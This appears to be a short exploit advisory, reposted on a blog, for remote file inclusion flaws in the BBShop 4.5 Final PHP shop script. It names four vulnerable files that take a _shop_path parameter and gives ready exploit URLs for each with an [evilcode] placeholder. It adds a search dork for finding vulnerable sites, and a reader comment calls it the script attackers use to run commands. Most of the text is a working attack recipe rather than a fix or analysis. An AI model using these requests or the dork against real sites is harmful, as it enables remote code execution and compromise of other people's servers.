LFI to RCE via access_log injection

BBShop 4.5 Final - Multiple RFI


[o] BBShop 4.5 Final Multiple Remote File Inclusion Vulnerability
Software : BBShop version 4.5
Vendor : http://zzem.co.kr/
Developer : The Win
Author : NoGe


[o] Vulnerable file
bbshop/shop/index.php
bbshop/shop/main.php
bbshop/admin/admin.php
bbshop/admin/index.php
all this file is affected by _shop_path variable


[o] Exploit
http://localhost/[path]/bbshop/shop/index.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/shop/main.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/admin.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/index.php?_shop_path=[evilcode]


[o] Dork
"bbshop"


Comments

labatterie said…
The script that attacker use to execute command on vulnerable site.